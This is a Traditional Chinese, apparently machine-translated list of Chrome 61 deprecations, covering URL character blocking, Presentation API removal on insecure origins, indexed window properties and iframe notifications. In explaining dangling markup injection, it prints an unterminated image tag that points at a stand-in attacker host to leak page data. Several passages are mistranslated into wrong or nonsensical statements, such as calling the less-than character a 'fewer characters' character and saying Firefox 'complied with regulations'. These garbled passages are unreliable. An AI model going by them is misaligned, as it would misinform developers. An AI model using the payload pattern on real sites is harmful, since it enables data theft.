在絕大多數的 Chrome 版本中,我們都發現大量的更新和改善項目,包含產品、效能和網路平台的功能。本文說明 Chrome 61 的淘汰和移除功能 (於 8 月 3 日推出 Beta 版)。這份清單隨時可能有所變動。
安全性與隱私權
封鎖網址包含「\n」和「<」字元的資源
有一種入侵行為,稱為「中斷標記植入」,會使用遭截斷的網址將資料傳送至外部端點。舉例來說,假設網頁含有 <img src='https://evil.com/?
。由於網址沒有結尾引號,瀏覽器會讀取下一個出現的引號,並將封閉式字元視為單一網址。
Chrome 61 會限制 href
和 src
屬性允許的字元集,藉此降低這個安全漏洞。具體來說,Chrome 會在發現新的行字元 (\n
) 且少於字元 (<
) 時停止處理網址。
如果開發人員允許換行使用且網址所含的字元數不足,則應改為逸出這些字元。
意圖移除 | Chrome 狀態追蹤工具 | Chromium 錯誤
淘汰並移除不安全內容中的 Presentation API
該公司發現,在不安全的來源上,發表 API 可做為在不安全的來源上遭駭的駭客。由於螢幕沒有網址列,因此這個 API 可用於假冒內容。您也能從執行簡報中竊取資料。
為配合 Blink 的意圖,移除不安全來源的強大功能,我們打算淘汰並移除對不安全內容下 Presentation API 的支援。自 Chrome 61 版起,PresentationRequest.start()
將無法在不安全的來源上執行。
意圖移除 | Chrome 狀態追蹤工具 | Chromium 錯誤
JavaScript
不允許定義 Windows 上已建立索引的屬性
過去,部分瀏覽器支援進行 JavaScript 指派,如下所示:
window[0] = 1;
目前的 HTML 規格指出這確實違反 JavaScript 規格,因此 Chrome 61 已移除這項功能。自 2016 年 2 月起,Firefox 已符合法規。
移除不安全的 iframe 通知使用
來自 iframe 的權限要求可能會混淆使用者,因為很難區分包含的網頁來源和提出要求的 iframe 來源。如果要求範圍不明確,使用者就無法判斷要授予或拒絕權限。
禁止在 iframe 中使用通知,也能夠讓通知權限要求與推播通知的相關規定保持一致,這樣開發人員就會覺得阻礙。
需要這項功能的開發人員可以開啟新視窗來要求通知權限。